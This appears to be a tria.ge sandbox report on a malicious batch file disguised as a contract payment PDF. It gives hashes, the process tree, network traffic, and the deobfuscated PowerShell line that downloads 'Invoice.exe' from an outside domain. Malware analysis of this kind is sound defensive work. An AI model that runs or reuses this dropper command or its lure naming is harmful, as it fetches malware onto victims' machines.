Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    117s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    06/02/2025, 15:32 UTC

General

  • Target

    CONTRACT_AGREEMENT_PAYMENT_0037836589337_PDF.bat

  • Size

    349B

  • MD5

    512ff935108c90d1338702a7af2d56f7

  • SHA1

    fc9a789bd4811be4dffc04c9475daaad3413e546

  • SHA256

    de11223dc99c7be3dab1e860b3c582a138432cf6d234ba335a1f51bd95894579

  • SHA512

    6f8c350373e660c0546578039ccf20399ac7fe1eb4037e75124ac6dfbf2e555ffabe0550883bb3a83d7c7665d716bfc9ab379acd7baf559e747eba195da7461f

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
1
(new-object system.net.webclient).downloadfile("https://igorbende.online/Main/Invoice.exe", "Invoice.exe")
2
URLs
exe.dropper

https://igorbende.online/Main/Invoice.exe

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\CONTRACT_AGREEMENT_PAYMENT_0037836589337_PDF.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2540
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://igorbende.online/Main/Invoice.exe', 'Invoice.exe')"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2412

Network

  • flag-us
    DNS
    igorbende.online
    powershell.exe
    Remote address:
    8.8.8.8:53
    Request
    igorbende.online
    IN A
    Response
    igorbende.online
    IN A
    199.188.200.89
  • 199.188.200.89:443
    igorbende.online
    tls
    powershell.exe
    350 B
    179 B
    5
    4
  • 199.188.200.89:443
    igorbende.online
    tls
    powershell.exe
    350 B
    179 B
    5
    4
  • 8.8.8.8:53
    igorbende.online
    dns
    powershell.exe
    62 B
    78 B
    1
    1

    DNS Request

    igorbende.online

    DNS Response

    199.188.200.89

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2412-4-0x000007FEF674E000-0x000007FEF674F000-memory.dmp

    Filesize

    4KB

  • memory/2412-5-0x000000001B650000-0x000000001B932000-memory.dmp

    Filesize

    2.9MB

  • memory/2412-6-0x0000000001D90000-0x0000000001D98000-memory.dmp

    Filesize

    32KB

  • memory/2412-7-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-8-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

    Filesize

    9.6MB

  • memory/2412-9-0x000007FEF6490000-0x000007FEF6E2D000-memory.dmp

    Filesize

    9.6MB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.